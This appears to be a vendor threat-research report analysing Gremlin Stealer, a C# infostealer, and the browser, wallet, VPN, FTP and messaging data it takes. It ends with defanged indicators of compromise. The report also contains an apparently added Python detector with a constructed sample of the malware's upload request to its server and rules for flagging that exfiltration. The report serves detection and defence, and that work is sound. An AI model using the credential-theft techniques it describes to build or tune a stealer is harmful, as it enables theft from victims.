Executive Summary

Unit 42 researchers have identified new information-stealing malware written in C#, called Gremlin Stealer. This stealer’s authors have actively advertised it on a Telegram group since mid-March 2025.

This information-stealing malware exfiltrates data from its victims and uploads this information to its web server for publication. It can capture data from browsers, the clipboard and the local disk to steal sensitive data such as credit card details, browser cookies, crypto wallet information, File Transfer Protocol (FTP) and virtual private network (VPN) credentials.

Palo Alto Networks customers are better protected from Gremlin Stealer through our Network Security solutions and Cortex line of products, including Cortex XDR and XSIAM, Advanced WildFire, Advanced Threat Prevention, Advanced URL Filtering and Advanced DNS Security.

If you think you might have been compromised or have an urgent matter, contact the Unit 42 Incident Response team.

Related Unit 42 Topics: Cryptocurrency, Infostealers, Telegram

Malware Advertisement

Gremlin Stealer’s authors predominantly distribute it through a Telegram channel named CoderSharp, and the malware is undergoing active development.

Sales and Feature Advertisement on Telegram

The description of Gremlin Stealer asserts that the malware can steal data from a wide range of software. Figure 1 shows a Telegram post advertising Gremlin Stealer.

Screenshot of Telegram describing the features of "Gremlin Stealer," malware written in C#. The text lists capabilities like bypassing Chrome V20 protection, stealing data from various cryptocurrencies and browsers, as well as obtaining information from popular VPN services and PC specs. The message also mentions pricing information and a contact method. Timestamp shows 09:00 PM. Some of the information is redacted.
Figure 1. Telegram post advertising Gremlin Stealer.

Published Stolen Data

The group behind Gremlin Stealer claims to have uploaded vast amounts of data from its victims' machines to its server at 207.244.199[.]46. We assess this server is a configurable portal that comes with the sale of the malware.

Figure 2 shows a screenshot of Gremlin Stealer’s website login page.

Screenshot of login screen for Gremlin featuring a logo with a stylized mask above two text fields labeled for username and password respectively, and a login button labeled 'Войти'.
Figure 2. Gremlin Stealer login page.

The Gremlin Stealer website currently displays 14 files. The authors of the website describe these files as ZIP archives of stolen data from victims' machines, with options to delete or download the archives.

As indicated by the timestamps in Figure 3, Gremlin Stealer has been active since March 2025.

Dashboard interface of Gremlin featuring metrics such as MB of data stored alongside a series of cards displaying file data with sensitive information redacted.
Figure 3. Gremlin Stealer site showing entries for stolen victim data.

The web interface shown in Figure 3 also demonstrates the user interface of the backend infrastructure that comes with the purchase of this malware.

Technical Analysis

We have monitored Gremlin Stealer since we initially discovered it in March 2025. The functions of this stealer from Figure 1 are listed below.

Stealer functions

  • Basic features include:
    • Bypassing Chrome cookie V20 protection
    • Its build process does not download anything from the internet
  • Stealing functionality targets the following:
    • Popular browsers (e.g., cookies, passwords, cards, forms)
    • Popular cryptocurrencies
    • Clipboard data
    • FTP services
    • Steam (token and session data)
    • Popular VPN services
    • Telegram session data
    • Discord tokens (spot search by browsers)
    • Screenshots
    • Specified information from victim PC (e.g., BSID, HVID, RAM, CPU, GPU and IP address)

Bypass Chrome Cookie V20 Protection

The first feature advertised for Gremlin Stealer is that it bypasses Chrome’s cookie v20 protection. Figure 4 shows code snippets from a Gremlin Stealer sample viewed in dnSpy.

A screenshot of a computer screen displaying a code in an Integrated Development Environment (IDE). The code includes functions and the syntax is color-coded.
Figure 4. GetCookies function from a Gremlin Stealer sample shown in dnSpy.

This view shows the GetCookies function under a V20Collect class, which demonstrates how it bypasses Chrome's cookie V20 protection and obtains cookie-related information. This is a common technique that has been used by many information stealers. Google made changes to prevent the use of this technique, as detailed in the post, “Changes to remote debugging switches to improve security.”

Below, Figure 5 shows the writteCookieToFile function that writes stolen information into a text file under the LOCAL_APP_DATA folder for uploading to Gremlin's server. The text file contains the associated domain, name, value, path and expiration date for each of the cookies.

A screenshot of computer code written in C# programming language of the GetCookies function.
Figure 5. GetCookies function from a Gremlin Stealer sample in dnSpy.

Support for Chromium and Gecko Browsers

Gremlin Stealer checks for cookies and saved passwords from an extensive list of Chromium- and Gecko-based browsers and writes them into a file to be exfiltrated later.

Below, Figure 6 shows a code snippet from the ChromiumBrowsers function with a list of Chromium-based browsers it steals from. A RunBrowserv20 function is also called to handle newer cookie encryption called "v20" in Chromium-based browsers. There is also an equivalent function built to handle a list of Gecko-based browsers.

Screenshot of a computer program code snippet, showing functions written in C# language to handle application data paths for browsers like Google Chrome, Firefox, and Microsoft Edge. Several parts of the text are redacted with red bars.
Figure 6. ChromiumBrowsers function.

Cryptocurrency Wallet Stealer

Figure 7 shows that Gremlin Stealer checks for various cryptocurrency wallets and steals files from each directory.

A screenshot of computer code related to various cryptocurrencies like Bitcoin, Ethereum, and Litecoin.
Figure 7. List of cryptocurrency wallets targeted by Gremlin Stealer.

Taking Litecoin as an example, Gremlin Stealer checks for a related registry entry. If found, it copies the wallet.dat file to a temporary directory, as illustrated in Figure 8 below.

Screenshot of code written in C# LitecoinCore. The code includes operations involving the Windows Registry and file management related to 'LitecoinCore' wallet data.
Figure 8. Gremlin Stealer's Litecoin wallet stealing function.

As Figure 9 shows, Gremlin Stealer searches for files containing a list of domains associated with each cryptocurrency in specific folders and then duplicates these files for later exfiltration. It also creates a hash list representing the data to be exported.

Screenshot of a computer code snippet with much of the information redacted by red highlight.
Figure 9. Cryptocurrency-related domains that Gremlin Stealer searches for.

FTP Credentials

Gremlin Stealer attempts to steal FTP usernames and passwords. Figure 10 shows a decompiled code snippet for the TotalCommander FTP credential-stealing function.

A screenshot of code is written in C# and includes functions to create directories and handle files.
Figure 10. Gremlin Stealer code snippet for copying TotalCommander files.

VPN Credentials

Gremlin Stealer also obtains username, password and configuration files from popular VPN clients. Figure 11 shows a code snippet of the VPN stealing function.

Screenshot of a computer screen displaying code with highlighted syntax and some information redacted with red highlight.
Figure 11. Gremlin Stealer code snippet for stealing VPN data.

Telegram and Discord Sessions

Gremlin Stealer also targets data and session information from Telegram and Discord to upload to its configured server.

Figures 12 and 13 show code snippets for stealing information from Telegram and Discord.

A screenshot of a code snippet written in C# aiming to get the path of the Telegram desktop application if it is running, utilizing the Environment and Process classes.
Figure 12. Gremlin Stealer code snippet for Telegram data stealing function.
Screenshot of code written in C#, written to steal Discord sessions.
Figure 13. Gremlin Stealer code snippet for Discord sessions stealing function.

System Information

Gremlin Stealer creates a text file that contains system information (e.g., PC username, clipboard data, processor information and hardware ID), as shown below in Figure 14.

A screenshot of Gremlin Stealer code with syntax highlighting. It includes various system information commands and functions about the operating system, screen resolution, CPU, RAM, and more.
Figure 14. Gremlin Stealer code snippet for system information stealing function.

Credit Card Information Stealing

This malware also steals credit card information and sends the data to its server. Figure 15 shows a code snippet of Gremlin Stealer's function to steal credit card information.

Screenshot of a computer code snippet written in C# programming language used for encrypting and decrypting credit card information.
Figure 15. Gremlin Stealer code snippet for the function to steal credit card information.

Uploading the Victim’s Files to Gremlin Stealer's Server

Figure 16 shows that Gremlin Stealer creates a folder under LOCAL_APP_DATA to store the following in plain text files:

  • Saved passwords
  • Cookies
  • Autofill data
  • Screenshots
  • System information
  • Discord sessions
  • Telegram sessions
  • FTP and VPN credentials
  • Cryptocurrency wallets data

A screenshot displaying multiple lines of code. The code includes references to system information, cookies, VPN detection, and more. Some sections of the text are obfuscated with red blocks for privacy.
Figure 16. Gremlin Stealer sends all stolen data to a private server.

These text files are gathered into a ZIP archive, which is sent to its server through the URL hxxp[:]//207.244.199[.]46/index.php, shown in Figure 17.

Screenshot of code featuring a public string variable named 'myPrivateServer' set to a local IP address, highlighted in red.
Figure 17. Code snippet with URL for Gremlin Stealer server.

Gremlin Stealer sends this data using the Telegram bot shown in Figure 18. It uploads the stolen data to the server using a hard-coded Telegram API key.

Screenshot of code with a Telegram URL highlighted in a red box.
Figure 18. Gremlin Stealer code snippet with URL for Telegram bot.

Figure 19 shows a TCP stream of an HTTP POST request that Gremlin Stealer makes when sending stolen information to its server. It sends the information as a ZIP archive that contains all the data stolen from the victim's Windows host.

A screenshot showing an HTTP POST request with multipart data. An arrow points to a host IP address and a second red arrow points to the ZIP file name that contains the public IP address of the victim host.
Figure 19. TCP stream of an HTTP POST request for a ZIP archive being uploaded to the Gremlin Stealer server.
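The upload shape described above (a multipart POST to index.php on the published server, carrying a ZIP whose filename is the victim's public IP) is something a network defender can look for in proxy or IDS logs. The following is an added example, not code from the article or from the malware: it parses a constructed HTTP request text and flags the traits the article describes. The boundary string, form field name and victim IP are placeholders; the server address is the one from the article's IoC list.

```python
import re
from dataclasses import dataclass, field
from typing import Optional

# Constructed sample of the multipart POST described in Figure 19.
# Only the Host/path come from the article's IoCs; everything else is made up.
SAMPLE_POST = (
    "POST /index.php HTTP/1.1\r\n"
    "Host: 207.244.199.46\r\n"
    "Content-Type: multipart/form-data; boundary=----constructed\r\n"
    "Content-Length: 1234\r\n"
    "\r\n"
    "------constructed\r\n"
    'Content-Disposition: form-data; name="file"; filename="198.51.100.23.zip"\r\n'
    "Content-Type: application/zip\r\n"
    "\r\n"
    "PK\x03\x04...\r\n"
    "------constructed--\r\n"
)

KNOWN_C2 = {"207.244.199.46"}          # server published in the article's IoC list
IPV4_ZIP = re.compile(r"(?:\d{1,3}\.){3}\d{1,3}\.zip$", re.IGNORECASE)

@dataclass
class Finding:
    host: str
    path: str
    filename: str
    reasons: list = field(default_factory=list)

def inspect_http_post(raw: str) -> Optional[Finding]:
    """Return a Finding when a request matches the Gremlin Stealer upload pattern, else None."""
    head, _, body = raw.partition("\r\n\r\n")          # split headers from multipart body
    request_line, *header_lines = head.split("\r\n")
    method, path, _ = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        key, _, value = line.partition(":")
        headers[key.strip().lower()] = value.strip()
    if method != "POST" or not headers.get("content-type", "").startswith("multipart/form-data"):
        return None
    match = re.search(r'filename="([^"]+)"', body)     # uploaded part's filename
    if not match:
        return None
    finding = Finding(headers.get("host", ""), path, match.group(1))
    if finding.host in KNOWN_C2:
        finding.reasons.append("destination is the published Gremlin Stealer server")
    if IPV4_ZIP.search(finding.filename):
        finding.reasons.append("ZIP filename is a bare IPv4 address (victim public IP)")
    if path.endswith("/index.php"):
        finding.reasons.append("upload path matches the article's index.php endpoint")
    return finding if finding.reasons else None
```

The filename and path checks also catch a rehosted copy of the same panel on a server that is not yet in the indicator list.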

Conclusion

Gremlin Stealer is new malware that has been active since March 2025. This malware searches for a variety of applications on a victim's Windows computer, and our code analysis confirms the specific applications targeted.

Stealers of this type are well-known entities in the threat landscape, and there are many approaches to protecting customers from these evolving attacks. Palo Alto Networks diligently monitors these campaigns, utilizing a range of static and dynamic techniques to detect and prevent them.

These methods include dynamic and behavioral detections, as well as more reactive signature or pattern-based solutions.

Palo Alto Networks Protection and Mitigation

Palo Alto Networks customers are better protected from the threats discussed above through the following products:

  • The Advanced WildFire machine-learning models and analysis techniques have been reviewed and updated in light of the IoCs shared in this research.
  • Advanced URL Filtering and Advanced DNS Security identify known domains and URLs associated with this activity as malicious.
  • Advanced Threat Prevention has an inbuilt machine learning-based detection that can detect exploits in real time.
  • Cortex XDR and XSIAM are designed to:
    • Prevent the execution of known malware, and also prevent the execution of unknown malware using Behavioral Threat Protection and machine learning based on the Local Analysis module.
    • Protect against credential gathering tools and techniques using the new Credential Gathering Protection available from Cortex XDR 3.4.
    • Detect post-exploit activity, including credential-based attacks, with behavioral analytics, through Cortex XDR Pro.

If you think you may have been compromised or have an urgent matter, get in touch with the Unit 42 Incident Response team or call:

  • North America: Toll Free: +1 (866) 486-4842 (866.4.UNIT42)
  • UK: +44.20.3743.3660
  • Europe and Middle East: +31.20.299.3130
  • Asia: +65.6983.8730
  • Japan: +81.50.1790.0200
  • Australia: +61.2.4062.7950
  • India: 00080005045107

Palo Alto Networks has shared these findings with our fellow Cyber Threat Alliance (CTA) members. CTA members use this intelligence to rapidly deploy protections to their customers and to systematically disrupt malicious cyber actors. Learn more about the Cyber Threat Alliance.

Indicators of Compromise

SHA256 hash of the Gremlin Stealer sample analyzed for this article:

  • d1ea7576611623c6a4ad1990ffed562e8981a3aa209717065eddc5be37a76132

URLs:

  • hxxp[:]//207.244.199[.]46/index.php